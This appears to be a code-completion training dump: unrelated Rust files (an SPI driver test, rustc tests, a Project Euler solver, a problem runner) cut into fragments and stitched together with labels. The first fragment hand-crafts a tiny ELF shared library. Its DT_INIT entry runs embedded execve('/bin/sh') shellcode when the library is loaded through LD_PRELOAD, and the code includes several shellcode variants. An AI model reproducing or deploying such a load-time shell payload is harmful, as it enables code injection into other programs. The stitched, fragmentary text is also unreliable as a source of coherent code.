header.e_type = header::ET_DYN | header::ET_EXEC;
println!("header {:?}", header);
for i in 0..(header.e_shnum as usize) {
let mut shdr: &mut SectionHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(header.e_shoff as isize).offset(header.e_shentsize as isize*i as isize) as *mut SectionHeader) };
println!("shdr {}: {:?}", i, shdr);
}
}
println!("elfbytes {:?}", elfbytes);
let mut file = File::create("libgolf.so")?;
file.write(&elfbytes)?;
Ok(())
}
fn main() -> Result<(), anyhow::Error>
|
e_shnum: 0,
e_shstrndx: 0,
};
println!("header: {:?}", header);
let mut phdr: &mut ProgramHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(128) as *mut ProgramHeader) };
*phdr = ProgramHeader {
p_type: Phdr::PT_LOAD,
p_flags: Phdr::PF_R | Phdr::PF_W | Phdr::PF_X,
p_offset: 0,
p_vaddr: 0x41410000,
p_paddr: 0x41410000,
p_filesz: 512,
p_memsz: 512,
p_align: 0x1000,
};
println!("phdr: {:?}", phdr);
let mut phdr2: &mut ProgramHeader = unsafe { &mut *(elfbytes.as_mut_ptr().offset(128).offset(mem::size_of::<ProgramHeader>() as _) as *mut ProgramHeader) };
*phdr2 = ProgramHeader {
p_type: Phdr::PT_DYNAMIC,
p_flags: Phdr::PF_R | Phdr::PF_W | Phdr::PF_X,
p_offset: 400,
p_vaddr: 0x41410190,
p_paddr: 0,
p_filesz: mem::size_of::<dynamic::Dyn>() as _,
p_memsz: mem::size_of::<dynamic::Dyn>() as _,
p_align: 8,
};
println!("phdr2: {:?}", phdr2);
/*
0: 48 ba 2f 62 69 6e 2f movabs $0x68732f6e69622f,%rdx
7: 73 68 00
a: 48 83 e8 10 sub $0x10,%rax
e: 48 89 10 mov %rdx,(%rax)
11: 48 89 c7 mov %rax,%rdi
14: 48 31 d2 xor %rdx,%rdx
17: 48 83 e8 08 sub $0x8,%rax
1b: 48 89 10 mov %rdx,(%rax)
1e: 48 83 e8 08 sub $0x8,%rax
22: 48 89 38 mov %rdi,(%rax)
25: 48 89 c6 mov %rax,%rsi
28: 48 31 c0 xor %rax,%rax
2b: b0 3b mov $0x3b,%al
2d: 0f 05 syscall
---
b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x08\x48\x89\x10\x48\x83\xe8\x08\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05"
*/
//let shellcode = b"\xeb\xfe";
//let shellcode = b"\xff\x34\x25\x2f\x73\x68\x00\xff\x34\x25\x2f\x62\x69\x6e\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x31\xd2\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05\xeb\xfe";
//let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x10\x48\x89\x10\x48\x83\xe8\x10\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05";
let shellcode = b"\x48\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x83\xe8\x10\x48\x89\x10\x48\x89\xc7\x48\x31\xd2\x48\x83\xe8\x08\x48\x89\x10\x48\x83\xe8\x08\x48\x89\x38\x48\x89\xc6\x48\x31\xc0\xb0\x3b\x0f\x05";
for (i, x) in shellcode.iter().enumerate() {
elfbytes[256+i] = *x;
}
let dynamic = vec![
// https://docs.oracle.com/cd/E19683-01/817-3677/chapter6-42444/index.html
//dynamic::Dyn { d_tag: DT_HASH, d_val: 1 },
dynamic::Dyn { d_tag: DT_INIT, d_val: 0x41410100 },
dynamic::Dyn { d_tag: DT_STRTAB, d_val: 2 },
dynamic::Dyn { d_tag: DT_SYMTAB, d_val: 3 },
dynamic::Dyn { d_tag: DT_STRSZ, d_val: 0 },
dynamic::Dyn { d_tag: DT_SYMENT, d_val: 0 },
dynamic::Dyn { d_tag: DT_NULL, d_val: 0 },
];
let mut dynamic_raw: &mut [dynamic::Dyn] = unsafe { std::slice::from_raw_parts_mut(elfbytes.as_mut_ptr().offset(400) as *mut dynamic::Dyn, dynamic.len()) };
for (x, y) in dynamic.into_iter().zip(dynamic_raw.iter_mut()) {
*y = x;
}
let mut file = File::create("libgolf2.so")?;
file.write(&elfbytes)?;
Ok(())
}
/*
set follow-fork-mode child
r -c 'LD_PRELOAD=./libgolf2.so /bin/true'
*/
|
{
/*let bytes_from_c = fs::read("./a.out")?;
let from_c = Elf::parse(&bytes_from_c)?;
println!("{:#?}", from_c);*/
let e_ident = [0x7f, b'E', b'L', b'F', header::ELFCLASS64, header::ELFDATA2LSB, header::EV_CURRENT, header::ELFOSABI_NONE, 0, 0, 0, 0, 0, 0, 0, 0];
let mut elfbytes = vec![0; 512];
let mut header: &mut Header = unsafe { &mut *(elfbytes.as_mut_ptr() as *mut Header) };
*header = Header {
e_ident,
e_type: header::ET_DYN,
e_machine: header::EM_X86_64,
e_version: header::EV_CURRENT as _,
e_entry: 0x41410100,
e_phoff: 128,
e_shoff: 0,
e_flags: 0,
e_ehsize: mem::size_of::<Header>() as _,
e_phentsize: mem::size_of::<ProgramHeader>() as _,
e_phnum: 2,
e_shentsize: mem::size_of::<SectionHeader>() as _,
|
identifier_body
|
spi_dummy.rs
|
///! A dummy SPI client to test the SPI implementation
use sam4l;
use hil::gpio;
use hil::spi_master::{self, SpiMaster};
#[allow(unused_variables,dead_code)]
pub struct DummyCB {
val: u8
}
pub static mut FLOP: bool = false;
pub static mut buf1: [u8; 8] = [0, 0, 0, 0, 0, 0, 0, 0];
pub static mut buf2: [u8; 8] = [8, 7, 6, 5, 4, 3, 2, 1];
impl spi_master::SpiCallback for DummyCB {
#[allow(unused_variables,dead_code)]
fn read_write_done(&'static self) {
unsafe {
FLOP =!FLOP;
let len: usize = buf1.len();
if FLOP {
sam4l::spi::SPI.read_write_bytes(Some(&mut buf1), Some(&mut buf2), len);
} else {
sam4l::spi::SPI.read_write_bytes(Some(&mut buf2), Some(&mut buf1), len);
}
}
}
}
pub static mut SPICB: DummyCB = DummyCB{val: 0x55 as u8};
// This test first asserts the Firestorm's pin 2, then initiates a continuous
// SPI transfer of 8 bytes.
//
|
// the SPI MOSI and CLK pins (exposed on the Firestorm's 22-pin header). Setup
// the logic analyzer to trigger sampling on assertion of pin 2, then restart
// the board.
pub unsafe fn spi_dummy_test() {
let pin2 : &mut gpio::GPIOPin = &mut sam4l::gpio::PA[16];
pin2.enable_output();
pin2.set();
sam4l::spi::SPI.set_active_peripheral(sam4l::spi::Peripheral::Peripheral1);
sam4l::spi::SPI.init(&SPICB);
sam4l::spi::SPI.enable();
let len = buf2.len();
sam4l::spi::SPI.read_write_bytes(Some(&mut buf2), Some(&mut buf1), len);
}
|
// The first SPI transfer outputs [8, 7, 6, 5, 4, 3, 2, 1] then echoes whatever
// input it recieves from the slave on peripheral 1 continuously.
//
// To test with a logic analyzer, connect probes to pin 2 on the Firestorm, and
|
random_line_split
|
spi_dummy.rs
|
///! A dummy SPI client to test the SPI implementation
use sam4l;
use hil::gpio;
use hil::spi_master::{self, SpiMaster};
#[allow(unused_variables,dead_code)]
pub struct DummyCB {
val: u8
}
pub static mut FLOP: bool = false;
pub static mut buf1: [u8; 8] = [0, 0, 0, 0, 0, 0, 0, 0];
pub static mut buf2: [u8; 8] = [8, 7, 6, 5, 4, 3, 2, 1];
impl spi_master::SpiCallback for DummyCB {
#[allow(unused_variables,dead_code)]
fn read_write_done(&'static self)
|
}
pub static mut SPICB: DummyCB = DummyCB{val: 0x55 as u8};
// This test first asserts the Firestorm's pin 2, then initiates a continuous
// SPI transfer of 8 bytes.
//
// The first SPI transfer outputs [8, 7, 6, 5, 4, 3, 2, 1] then echoes whatever
// input it recieves from the slave on peripheral 1 continuously.
//
// To test with a logic analyzer, connect probes to pin 2 on the Firestorm, and
// the SPI MOSI and CLK pins (exposed on the Firestorm's 22-pin header). Setup
// the logic analyzer to trigger sampling on assertion of pin 2, then restart
// the board.
pub unsafe fn spi_dummy_test() {
let pin2 : &mut gpio::GPIOPin = &mut sam4l::gpio::PA[16];
pin2.enable_output();
pin2.set();
sam4l::spi::SPI.set_active_peripheral(sam4l::spi::Peripheral::Peripheral1);
sam4l::spi::SPI.init(&SPICB);
sam4l::spi::SPI.enable();
let len = buf2.len();
sam4l::spi::SPI.read_write_bytes(Some(&mut buf2), Some(&mut buf1), len);
}
|
{
unsafe {
FLOP = !FLOP;
let len: usize = buf1.len();
if FLOP {
sam4l::spi::SPI.read_write_bytes(Some(&mut buf1), Some(&mut buf2), len);
} else {
sam4l::spi::SPI.read_write_bytes(Some(&mut buf2), Some(&mut buf1), len);
}
}
}
|
identifier_body
|
spi_dummy.rs
|
///! A dummy SPI client to test the SPI implementation
use sam4l;
use hil::gpio;
use hil::spi_master::{self, SpiMaster};
#[allow(unused_variables,dead_code)]
pub struct
|
{
val: u8
}
pub static mut FLOP: bool = false;
pub static mut buf1: [u8; 8] = [0, 0, 0, 0, 0, 0, 0, 0];
pub static mut buf2: [u8; 8] = [8, 7, 6, 5, 4, 3, 2, 1];
impl spi_master::SpiCallback for DummyCB {
#[allow(unused_variables,dead_code)]
fn read_write_done(&'static self) {
unsafe {
FLOP =!FLOP;
let len: usize = buf1.len();
if FLOP {
sam4l::spi::SPI.read_write_bytes(Some(&mut buf1), Some(&mut buf2), len);
} else {
sam4l::spi::SPI.read_write_bytes(Some(&mut buf2), Some(&mut buf1), len);
}
}
}
}
pub static mut SPICB: DummyCB = DummyCB{val: 0x55 as u8};
// This test first asserts the Firestorm's pin 2, then initiates a continuous
// SPI transfer of 8 bytes.
//
// The first SPI transfer outputs [8, 7, 6, 5, 4, 3, 2, 1] then echoes whatever
// input it recieves from the slave on peripheral 1 continuously.
//
// To test with a logic analyzer, connect probes to pin 2 on the Firestorm, and
// the SPI MOSI and CLK pins (exposed on the Firestorm's 22-pin header). Setup
// the logic analyzer to trigger sampling on assertion of pin 2, then restart
// the board.
pub unsafe fn spi_dummy_test() {
let pin2 : &mut gpio::GPIOPin = &mut sam4l::gpio::PA[16];
pin2.enable_output();
pin2.set();
sam4l::spi::SPI.set_active_peripheral(sam4l::spi::Peripheral::Peripheral1);
sam4l::spi::SPI.init(&SPICB);
sam4l::spi::SPI.enable();
let len = buf2.len();
sam4l::spi::SPI.read_write_bytes(Some(&mut buf2), Some(&mut buf1), len);
}
|
DummyCB
|
identifier_name
|
spi_dummy.rs
|
///! A dummy SPI client to test the SPI implementation
use sam4l;
use hil::gpio;
use hil::spi_master::{self, SpiMaster};
#[allow(unused_variables,dead_code)]
pub struct DummyCB {
val: u8
}
pub static mut FLOP: bool = false;
pub static mut buf1: [u8; 8] = [0, 0, 0, 0, 0, 0, 0, 0];
pub static mut buf2: [u8; 8] = [8, 7, 6, 5, 4, 3, 2, 1];
impl spi_master::SpiCallback for DummyCB {
#[allow(unused_variables,dead_code)]
fn read_write_done(&'static self) {
unsafe {
FLOP =!FLOP;
let len: usize = buf1.len();
if FLOP {
sam4l::spi::SPI.read_write_bytes(Some(&mut buf1), Some(&mut buf2), len);
} else
|
}
}
}
pub static mut SPICB: DummyCB = DummyCB{val: 0x55 as u8};
// This test first asserts the Firestorm's pin 2, then initiates a continuous
// SPI transfer of 8 bytes.
//
// The first SPI transfer outputs [8, 7, 6, 5, 4, 3, 2, 1] then echoes whatever
// input it recieves from the slave on peripheral 1 continuously.
//
// To test with a logic analyzer, connect probes to pin 2 on the Firestorm, and
// the SPI MOSI and CLK pins (exposed on the Firestorm's 22-pin header). Setup
// the logic analyzer to trigger sampling on assertion of pin 2, then restart
// the board.
pub unsafe fn spi_dummy_test() {
let pin2 : &mut gpio::GPIOPin = &mut sam4l::gpio::PA[16];
pin2.enable_output();
pin2.set();
sam4l::spi::SPI.set_active_peripheral(sam4l::spi::Peripheral::Peripheral1);
sam4l::spi::SPI.init(&SPICB);
sam4l::spi::SPI.enable();
let len = buf2.len();
sam4l::spi::SPI.read_write_bytes(Some(&mut buf2), Some(&mut buf1), len);
}
|
{
sam4l::spi::SPI.read_write_bytes(Some(&mut buf2), Some(&mut buf1), len);
}
|
conditional_block
|
expr_method.rs
|
// Copyright 2016 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
|
#![allow(dead_code)]
#![deny(unreachable_code)]
struct Foo;
impl Foo {
fn foo(&self, x:!, y: usize) { }
fn bar(&self, x:!) { }
}
fn a() {
// the `22` is unreachable:
Foo.foo(return, 22); //~ ERROR unreachable
}
fn b() {
// the call is unreachable:
Foo.bar(return); //~ ERROR unreachable
}
fn main() { }
|
// except according to those terms.
#![feature(never_type)]
#![allow(unused_variables)]
#![allow(unused_assignments)]
|
random_line_split
|
expr_method.rs
|
// Copyright 2016 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![feature(never_type)]
#![allow(unused_variables)]
#![allow(unused_assignments)]
#![allow(dead_code)]
#![deny(unreachable_code)]
struct Foo;
impl Foo {
fn foo(&self, x:!, y: usize) { }
fn bar(&self, x:!) { }
}
fn a() {
// the `22` is unreachable:
Foo.foo(return, 22); //~ ERROR unreachable
}
fn b() {
// the call is unreachable:
Foo.bar(return); //~ ERROR unreachable
}
fn
|
() { }
|
main
|
identifier_name
|
capturing-logging.rs
|
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// exec-env:RUST_LOG=info
#![allow(unknown_features)]
#![feature(box_syntax)]
#[macro_use]
extern crate log;
use log::{set_logger, Logger, LogRecord};
use std::sync::mpsc::channel;
use std::fmt;
use std::old_io::{ChanReader, ChanWriter};
use std::thread::Thread;
struct MyWriter(ChanWriter);
impl Logger for MyWriter {
fn log(&mut self, record: &LogRecord) {
let MyWriter(ref mut inner) = *self;
write!(inner, "{}", record.args);
}
}
fn main()
|
{
let (tx, rx) = channel();
let (mut r, w) = (ChanReader::new(rx), ChanWriter::new(tx));
let _t = Thread::spawn(move|| {
set_logger(box MyWriter(w) as Box<Logger+Send>);
debug!("debug");
info!("info");
});
let s = r.read_to_string().unwrap();
assert!(s.contains("info"));
assert!(!s.contains("debug"));
}
|
identifier_body
|
|
capturing-logging.rs
|
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
|
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// exec-env:RUST_LOG=info
#![allow(unknown_features)]
#![feature(box_syntax)]
#[macro_use]
extern crate log;
use log::{set_logger, Logger, LogRecord};
use std::sync::mpsc::channel;
use std::fmt;
use std::old_io::{ChanReader, ChanWriter};
use std::thread::Thread;
struct MyWriter(ChanWriter);
impl Logger for MyWriter {
fn log(&mut self, record: &LogRecord) {
let MyWriter(ref mut inner) = *self;
write!(inner, "{}", record.args);
}
}
fn main() {
let (tx, rx) = channel();
let (mut r, w) = (ChanReader::new(rx), ChanWriter::new(tx));
let _t = Thread::spawn(move|| {
set_logger(box MyWriter(w) as Box<Logger+Send>);
debug!("debug");
info!("info");
});
let s = r.read_to_string().unwrap();
assert!(s.contains("info"));
assert!(!s.contains("debug"));
}
|
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
|
random_line_split
|
capturing-logging.rs
|
// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// exec-env:RUST_LOG=info
#![allow(unknown_features)]
#![feature(box_syntax)]
#[macro_use]
extern crate log;
use log::{set_logger, Logger, LogRecord};
use std::sync::mpsc::channel;
use std::fmt;
use std::old_io::{ChanReader, ChanWriter};
use std::thread::Thread;
struct MyWriter(ChanWriter);
impl Logger for MyWriter {
fn log(&mut self, record: &LogRecord) {
let MyWriter(ref mut inner) = *self;
write!(inner, "{}", record.args);
}
}
fn
|
() {
let (tx, rx) = channel();
let (mut r, w) = (ChanReader::new(rx), ChanWriter::new(tx));
let _t = Thread::spawn(move|| {
set_logger(box MyWriter(w) as Box<Logger+Send>);
debug!("debug");
info!("info");
});
let s = r.read_to_string().unwrap();
assert!(s.contains("info"));
assert!(!s.contains("debug"));
}
|
main
|
identifier_name
|
p042.rs
|
//! [Problem 42](https://projecteuler.net/problem=42) solver.
#![warn(bad_style,
unused, unused_extern_crates, unused_import_braces,
unused_qualifications, unused_results)]
#[macro_use(problem)] extern crate common;
extern crate seq;
use std::fs::File;
use std::io::{self, BufReader};
use std::io::prelude::*;
use seq::TriangularNums;
fn word_to_value(word: &str) -> u32 {
let mut value = 0;
for b in word.bytes() {
value += (b - ('A' as u8) + 1) as u32;
}
value
}
fn solve(file: File) -> io::Result<String>
|
problem!("162", "p042_words.txt", solve);
#[cfg(test)]
mod tests {
#[test]
fn word_to_value() {
assert_eq!(55, super::word_to_value("SKY"));
}
}
|
{
let mut values = vec![];
for bytes in BufReader::new(file).split(b',') {
let word_str = String::from_utf8(try!(bytes)).unwrap();
let word = word_str
.trim_right_matches(',')
.trim_matches('\"');
values.push(word_to_value(word));
}
let max_value = *values.iter().max().unwrap();
let mut is_tri = vec![false; (max_value + 1) as usize];
for t in TriangularNums::<u32>::new().take_while(|&t| t <= max_value) {
is_tri[t as usize] = true;
}
Ok(values.iter().filter(|&&v| is_tri[v as usize]).count().to_string())
}
|
identifier_body
|
p042.rs
|
//! [Problem 42](https://projecteuler.net/problem=42) solver.
#![warn(bad_style,
unused, unused_extern_crates, unused_import_braces,
unused_qualifications, unused_results)]
#[macro_use(problem)] extern crate common;
extern crate seq;
use std::fs::File;
use std::io::{self, BufReader};
use std::io::prelude::*;
use seq::TriangularNums;
fn word_to_value(word: &str) -> u32 {
let mut value = 0;
for b in word.bytes() {
value += (b - ('A' as u8) + 1) as u32;
}
value
}
fn
|
(file: File) -> io::Result<String> {
let mut values = vec![];
for bytes in BufReader::new(file).split(b',') {
let word_str = String::from_utf8(try!(bytes)).unwrap();
let word = word_str
.trim_right_matches(',')
.trim_matches('\"');
values.push(word_to_value(word));
}
let max_value = *values.iter().max().unwrap();
let mut is_tri = vec![false; (max_value + 1) as usize];
for t in TriangularNums::<u32>::new().take_while(|&t| t <= max_value) {
is_tri[t as usize] = true;
}
Ok(values.iter().filter(|&&v| is_tri[v as usize]).count().to_string())
}
problem!("162", "p042_words.txt", solve);
#[cfg(test)]
mod tests {
#[test]
fn word_to_value() {
assert_eq!(55, super::word_to_value("SKY"));
}
}
|
solve
|
identifier_name
|
p042.rs
|
//! [Problem 42](https://projecteuler.net/problem=42) solver.
#![warn(bad_style,
|
unused_qualifications, unused_results)]
#[macro_use(problem)] extern crate common;
extern crate seq;
use std::fs::File;
use std::io::{self, BufReader};
use std::io::prelude::*;
use seq::TriangularNums;
fn word_to_value(word: &str) -> u32 {
let mut value = 0;
for b in word.bytes() {
value += (b - ('A' as u8) + 1) as u32;
}
value
}
fn solve(file: File) -> io::Result<String> {
let mut values = vec![];
for bytes in BufReader::new(file).split(b',') {
let word_str = String::from_utf8(try!(bytes)).unwrap();
let word = word_str
.trim_right_matches(',')
.trim_matches('\"');
values.push(word_to_value(word));
}
let max_value = *values.iter().max().unwrap();
let mut is_tri = vec![false; (max_value + 1) as usize];
for t in TriangularNums::<u32>::new().take_while(|&t| t <= max_value) {
is_tri[t as usize] = true;
}
Ok(values.iter().filter(|&&v| is_tri[v as usize]).count().to_string())
}
problem!("162", "p042_words.txt", solve);
#[cfg(test)]
mod tests {
#[test]
fn word_to_value() {
assert_eq!(55, super::word_to_value("SKY"));
}
}
|
unused, unused_extern_crates, unused_import_braces,
|
random_line_split
|
check-doc-alias-attr.rs
|
#![crate_type = "lib"]
#[doc(alias = "foo")] // ok!
#[doc(alias("bar", "baz"))] // ok!
pub struct Bar;
#[doc(alias)] //~ ERROR
#[doc(alias = 0)] //~ ERROR
#[doc(alias = "\"")] //~ ERROR
#[doc(alias = "\n")] //~ ERROR
#[doc(alias = "
")] //~^ ERROR
#[doc(alias = "\t")] //~ ERROR
#[doc(alias = " hello")] //~ ERROR
#[doc(alias = "hello ")] //~ ERROR
#[doc(alias = "")] //~ ERROR
pub struct Foo;
#[doc(alias(0))] //~ ERROR
#[doc(alias("\""))] //~ ERROR
#[doc(alias("\n"))] //~ ERROR
#[doc(alias("
"))] //~^ ERROR
#[doc(alias("\t"))] //~ ERROR
#[doc(alias(" hello"))] //~ ERROR
#[doc(alias("hello "))] //~ ERROR
#[doc(alias(""))] //~ ERROR
pub struct
|
;
|
Foo2
|
identifier_name
|
check-doc-alias-attr.rs
|
#![crate_type = "lib"]
#[doc(alias = "foo")] // ok!
#[doc(alias("bar", "baz"))] // ok!
pub struct Bar;
#[doc(alias)] //~ ERROR
#[doc(alias = 0)] //~ ERROR
#[doc(alias = "\"")] //~ ERROR
#[doc(alias = "\n")] //~ ERROR
#[doc(alias = "
")] //~^ ERROR
|
#[doc(alias = " hello")] //~ ERROR
#[doc(alias = "hello ")] //~ ERROR
#[doc(alias = "")] //~ ERROR
pub struct Foo;
#[doc(alias(0))] //~ ERROR
#[doc(alias("\""))] //~ ERROR
#[doc(alias("\n"))] //~ ERROR
#[doc(alias("
"))] //~^ ERROR
#[doc(alias("\t"))] //~ ERROR
#[doc(alias(" hello"))] //~ ERROR
#[doc(alias("hello "))] //~ ERROR
#[doc(alias(""))] //~ ERROR
pub struct Foo2;
|
#[doc(alias = "\t")] //~ ERROR
|
random_line_split
|
problem.rs
|
use std::fs;
use std::fs::File;
use std::process::{Command, Stdio};
use std::io::prelude::*;
use std::io::BufReader;
use std::error::Error;
use std::fmt;
const PROBLEMS_DIR: &'static str = "problems";
const INPUT_DIR: &'static str = "input";
const OUTPUT_DIR: &'static str = "output";
pub struct Problem {
str_id: String,
statement: Vec<String>,
name: Vec<String>,
authors: Vec<String>,
}
enum State {
Default,
Name,
Statement,
Authors,
}
struct ProblemError {
sys_part: String,
reason: &'static str,
problem_strid: String,
test_no: i32,
}
impl Error for ProblemError {
fn description(&self) -> &str {
self.reason
}
}
impl fmt::Display for ProblemError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.test_no >= 0 {
write!(f, "{} on problem {} at test {}: {}", self.reason, self.problem_strid,
self.test_no, self.sys_part)
}
else {
write!(f, "{} on problem {}: {}", self.reason, self.problem_strid,
self.sys_part)
}
}
}
impl fmt::Debug for ProblemError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.test_no >= 0 {
write!(f, "{} on problem {} at test {}: {}", self.reason, self.problem_strid,
self.test_no, self.sys_part)
}
else {
write!(f, "{} on problem {}: {}", self.reason, self.problem_strid,
self.sys_part)
}
}
}
impl Problem {
pub fn new(str_id: String) -> Problem {
let mut statement = vec![];
let mut name = vec![];
let mut authors = vec![];
match File::open(format!("{}/{}/info.txt", PROBLEMS_DIR, str_id)) {
Ok(file) => {
let buf = BufReader::new(&file);
let mut state = State::Default;
for line in buf.lines() {
let l = line.unwrap();
match l.as_ref() {
"[authors]" => state = State::Authors,
"[name]" => state = State::Name,
"[statement]" => state = State::Statement,
"[end]" => break,
_ => {
match state {
State::Authors => authors.push(l.trim().to_string()),
State::Name => name.push(l.trim().to_string()),
State::Statement => statement.push(l.trim().to_string()),
_ => continue
}
}
}
}
},
Err(err) => panic!("Unable to load problem \"{}\" info: {}", str_id, err),
};
Problem {
str_id: str_id,
statement: statement,
name: name,
authors: authors,
|
.arg(format!("{}/{}/{}.rs", PROBLEMS_DIR, self.str_id, self.str_id))
.arg("--out-dir")
.arg(format!("{}/{}", PROBLEMS_DIR, self.str_id))
.output() {
Ok(cmd) => cmd,
Err(e) => return self.make_error("failed to execute rustc", e.to_string(), -1),
};
if!builder.status.success() {
let s = String::from_utf8_lossy(&builder.stderr);
return self.make_error("rustc failed to build problem", s.into_owned(), -1)
}
return self.run_test(1);
}
fn run_test(&self, test_no: i32) -> Result<(), ProblemError> {
let mut input = match File::open(format!("{}/{}/{}/{}.txt",
PROBLEMS_DIR, self.str_id, INPUT_DIR, test_no)) {
Ok(file) => file,
Err(e) => return self.make_error("failed to load test", e.to_string(), test_no),
};
let mut s = String::new(); // passing throw String coz as_slice still unstable
let result = input.read_to_string(&mut s);
if result.is_err() {
return self.make_error("couldn't read test", result.err().unwrap().to_string(), test_no);
}
let problem = match Command::new(format!("{}/{}/{}", PROBLEMS_DIR, self.str_id, self.str_id))
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.spawn() {
Ok(cmd) => cmd,
Err(e) => return self.make_error("failed to execute test", e.to_string(), test_no),
};
let result = problem.stdin.unwrap().write_all(s.as_bytes());
if result.is_err() {
return self.make_error("couldn't send stdin to test", result.err().unwrap().to_string(), test_no);
}
let mut s = String::new(); // passing throw String coz as_slice still unstable
let result = problem.stdout.unwrap().read_to_string(&mut s);
if result.is_err() {
return self.make_error("couldn't read stdout from test", result.err().unwrap().to_string(), test_no);
}
let result = fs::create_dir_all(format!("{}/{}/{}", PROBLEMS_DIR, self.str_id, OUTPUT_DIR));
if result.is_err() {
return self.make_error("couldn't write test answer", result.err().unwrap().to_string(), test_no);
}
let mut output = match File::create(format!("{}/{}/{}/{}.txt",
PROBLEMS_DIR, self.str_id, OUTPUT_DIR, test_no)) {
Ok(file) => file,
Err(e) => return self.make_error("failed to create test output file", e.to_string(), test_no),
};
let result = output.write_all(s.as_bytes());
if result.is_err() {
return self.make_error("couldn't write test answer", result.err().unwrap().to_string(), test_no);
}
Ok(())
}
fn make_error(&self, reason: &'static str, sys_part: String, test_no: i32) -> Result<(), ProblemError> {
Err(ProblemError {
reason:reason,
sys_part: sys_part,
problem_strid: self.str_id.clone(),
test_no: test_no
})
}
}
#[test]
fn read_test() {
let p = Problem::new("test".to_string());
assert_eq!(p.str_id, "test");
assert_eq!(p.authors, vec!["Testhor", "qwerty"]);
assert_eq!(p.name, vec!["Test name", "check"]);
assert_eq!(p.statement, vec!["Test statement", "3", "4"]);
let result = p.run();
if result.is_err() {
panic!(result.err().unwrap().to_string());
}
}
|
}
}
pub fn run(&self) -> Result<(), ProblemError> {
let builder = match Command::new("rustc")
|
random_line_split
|
problem.rs
|
use std::fs;
use std::fs::File;
use std::process::{Command, Stdio};
use std::io::prelude::*;
use std::io::BufReader;
use std::error::Error;
use std::fmt;
const PROBLEMS_DIR: &'static str = "problems";
const INPUT_DIR: &'static str = "input";
const OUTPUT_DIR: &'static str = "output";
pub struct Problem {
str_id: String,
statement: Vec<String>,
name: Vec<String>,
authors: Vec<String>,
}
enum State {
Default,
Name,
Statement,
Authors,
}
struct ProblemError {
sys_part: String,
reason: &'static str,
problem_strid: String,
test_no: i32,
}
impl Error for ProblemError {
fn description(&self) -> &str {
self.reason
}
}
impl fmt::Display for ProblemError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.test_no >= 0 {
write!(f, "{} on problem {} at test {}: {}", self.reason, self.problem_strid,
self.test_no, self.sys_part)
}
else {
write!(f, "{} on problem {}: {}", self.reason, self.problem_strid,
self.sys_part)
}
}
}
impl fmt::Debug for ProblemError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.test_no >= 0 {
write!(f, "{} on problem {} at test {}: {}", self.reason, self.problem_strid,
self.test_no, self.sys_part)
}
else {
write!(f, "{} on problem {}: {}", self.reason, self.problem_strid,
self.sys_part)
}
}
}
impl Problem {
pub fn new(str_id: String) -> Problem {
let mut statement = vec![];
let mut name = vec![];
let mut authors = vec![];
match File::open(format!("{}/{}/info.txt", PROBLEMS_DIR, str_id)) {
Ok(file) => {
